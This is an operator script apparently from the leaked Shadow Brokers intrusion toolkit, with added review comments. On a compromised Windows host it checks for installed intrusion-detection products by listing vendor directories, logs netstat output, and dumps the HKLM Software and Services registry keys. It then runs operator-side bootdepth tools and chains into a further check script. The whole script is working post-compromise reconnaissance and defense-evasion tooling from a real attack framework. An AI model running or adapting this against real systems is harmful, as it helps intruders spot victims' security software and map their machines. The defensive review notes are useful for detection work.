shadowbrokers-exploits/windows/Resources/Ep/Scripts/idslogger.eps


#--------------------------------------------------------
# File: idslogger.eps
#
# Start State:
# End State:
# Errors:
# Comments: Surveys a target for common host IDS installs (ISS, Network ICE,
#           NFR, Axent) by directory listing, then logs netstat output and the
#           "L" hive Software and System\CurrentControlSet\Services keys. If
#           every log step succeeded, runs the bootdepth tooling from the
#           operator-side scripts directory and chains into check_bootdepth.eps.
#
# Modifications:
# 01/06/03 Created
# 04/28/03 Edited to restrict data dragged back
# 04/28/03 edited to take out things that are done in simple.eps
# 05/08/03 changed comments to be more friendly
#--------------------------------------------------------
@echo off;
@record on;
# Resolve the scripts directory from the session (`getdirectory -scripts`);
# if that query fails, fall back to a hard-coded drive path.
# NOTE(review): the fallback uses forward slashes while every later path in
# this script uses escaped backslashes; the bootdepth command near the end
# concatenates "\\..\\..\\..\\tools\\..." onto whichever value is chosen.
string $ScriptsDir;
if(`getdirectory -scripts`) {
string $Dir = GetCmdData("dir");
$ScriptsDir = $Dir[0];
}else{
$ScriptsDir="E:/resources/ep/scripts";
}
@record off;
@echo on;
# Set to false by any failed `log` step below; this is also the script's
# return value.
bool $success = true;
@echo off;
# IDS survey: recursive directory listing under \Program Files for one of four
# vendor directories. Because this is an else-if chain, only the FIRST product
# directory that lists successfully is logged, even if several are installed
# (the 04/28/03 "restrict data dragged back" edit suggests this is deliberate,
# but it is not stated -- confirm). None of these branches touches $success,
# so finding no IDS directory is reported but is not treated as a failure.
# NOTE(review): from a defender's view, a process enumerating these specific
# security-vendor directories followed by a Software-hive dump is a recon
# pattern worth alerting on.
echo "Starting dir list:";if(`log dir -path "\\Program Files\\ISS" -max 0 -recursive`)
{
} else if(`log dir -path "\\Program Files\\Network ICE" -max 0 -recursive`)
{
} else if(`log dir -path "\\Program Files\\NFR" -max 0 -recursive`)
{
} else if(`log dir -path "\\Program Files\\Axent" -max 0 -recursive`)
{
} else {
echo " Found no standard IDS directories";
}
## This chunk of code drags back too much data
##echo "Starting tree list:";
#if (`log tree -path * -max 0`)
#{# echo " LOGGING";
#} else {
# echo " FAILED";
# $success = false;
#}
# Network survey: netstat output. Unlike the directory listing above, a
# failure here marks the whole run as unsuccessful.
echo "Starting port list:";
if (`log netstat`) {
echo " Examining netstat";
} else {
echo " FAILED";
$success = false;
}
# Registry survey, part 1: the entire "software" subkey of hive "L"
# (presumably HKEY_LOCAL_MACHINE -- confirm against the regquery command's
# hive letters). "-max 0" is presumably "no limit", as in the dir listings.
echo "getting registry (software):";
if(`log regquery -hive L -subkey software`) {
echo " Examining software in registry";
} else {
echo " FAILED";
$success = false;
}
# Registry survey, part 2: installed services / drivers under
# system\currentcontrolset\services in the same hive.
echo "getting registry (controlset/services):";
if(`log regquery -hive L -subkey system\\currentcontrolset\\services`) {
echo " Examining services in registry";
} else {
echo " FAILED";
$success = false;
}
@echo on;
# On any failure, report and pause for the operator (no bootdepth run).
# On full success, run two Perl tools located relative to $ScriptsDir via
# `local run` (i.e. on the operator side, not the target), each with its
# output redirected under the given name; only if both succeed is
# check_bootdepth.eps invoked. The exit status of that script is not
# folded into $success.
if ($success == false) {
echo "Unable to log some information";
pause;
} else {
echo "All information has been logged";
if (`local run -command "perl $ScriptsDir\\..\\..\\..\\tools\\bootdepth\\bootdepth.pl -x $ScriptsDir\\..\\..\\..\\tools\\bootdepth -d ." -redirect bootdepth`) {
if (`local run -command "perl $ScriptsDir\\..\\..\\..\\tools\\make_bootdepthcheck.pl" -redirect make_bootdepthcheck`) {
`script check_bootdepth.eps`;
}
}
}
# true only if netstat and both regquery steps logged successfully.
return $success;